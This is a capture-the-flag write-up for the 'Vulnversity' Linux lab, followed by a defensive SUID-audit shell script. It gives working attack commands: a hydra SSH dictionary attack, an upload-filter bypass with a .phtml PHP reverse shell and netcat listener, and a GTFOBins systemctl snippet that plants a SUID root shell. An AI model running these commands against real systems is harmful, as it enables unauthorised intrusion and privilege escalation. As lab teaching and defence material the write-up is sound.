
[Linux] Vulnversity
Reconnaissance
sudo nmap 10.10.82.240
sudo nmap -A -p 10.10.82.240


Enumeration
SMB
SMB is likely to reveal more information because it is often misunderstood and poorly implemented.
enum4linux -a 10.10.82.240

We find a Unix user called Bill.
SSH
We can use this information to conduct a dictionary attack against Bill's SSH password on the Linux machine.
hydra -l bill -P /usr/share/wordlists/rockyou.txt 10.10.82.240 ssh
It fails!
HTTP
The website on port 3128 is not accessible.

The website on port 3333 is accessible, so we can enumerate its pages and directories under that URL.

gobuster dir -u http://10.10.82.240:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The /internal page is an upload interface. We need to determine which file extensions are accepted, and Burp Intruder will help us identify the extensions that can be uploaded.


Exploitation
The server accepts .phtml files, so we will create a reverse shell with this extension.
tree /usr/share/webshells/
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.phtml

We start a netcat listener, upload this file and then browse to it so that the reverse shell connects back.
nc -nlvp 1234

We can then upgrade to a stable shell using the following procedure.

Privilege Escalation
We can search for all files with the SUID bit set, and we find quite a few.
find / -perm -u=s -type f 2>/dev/null
The systemctl command is listed. Since this command normally requires root (sudo) privileges to run, finding it with the SUID bit set lets us use GTFOBins to find a snippet that will elevate our privileges.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/stef -p

Remediation
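A SUID systemctl is the root cause of the escalation above, and the chmod +s copy of bash it leaves in /tmp is the artifact a defender should look for. The script below is an added example and not part of the original writeup: it audits the output of the same find command against an allowlist of binaries that are expected to be SUID (the allowlist is an assumption for a typical Ubuntu host) and prints the chmod command that clears the bit on anything unexpected.

```shell
#!/bin/sh
# Added example: audit `find / -perm -u=s -type f` output against an allowlist
# of binaries that are legitimately SUID. The list is an assumed baseline for
# a typical Ubuntu host; adjust it to your own build image.

ALLOWED_SUID="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign"

# Read SUID paths from stdin and print every one not on the allowlist.
# Returns 0 when nothing unexpected was found, 1 otherwise.
audit_suid() {
    unexpected=0
    while IFS= read -r path; do
        case "$path" in "") continue ;; esac
        # -F: literal match, -x: whole line, so /usr/bin/su never matches /usr/bin/sudo
        if ! printf '%s\n' "$ALLOWED_SUID" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
            unexpected=1
        fi
    done
    return "$unexpected"
}

# Print (not run) the command that clears the SUID bit on each unexpected file;
# review the list before applying it.
suggest_fix() {
    audit_suid | while IFS= read -r path; do
        printf 'chmod u-s %s\n' "$path"
    done
}

# Constructed sample of find output from a host like the one in this writeup:
# two legitimate entries, a SUID systemctl and the /tmp/stef copy of bash.
SAMPLE_FIND_OUTPUT="/usr/bin/passwd
/usr/bin/sudo
/bin/systemctl
/usr/bin/mount
/tmp/stef"

# On a live host: find / -perm -u=s -type f 2>/dev/null | audit_suid
printf '%s\n' "$SAMPLE_FIND_OUTPUT" | audit_suid || echo "unexpected SUID files found"
```

Scheduling this audit and diffing its output against the previous run turns a one-off check into a detection for newly planted SUID files such as /tmp/stef.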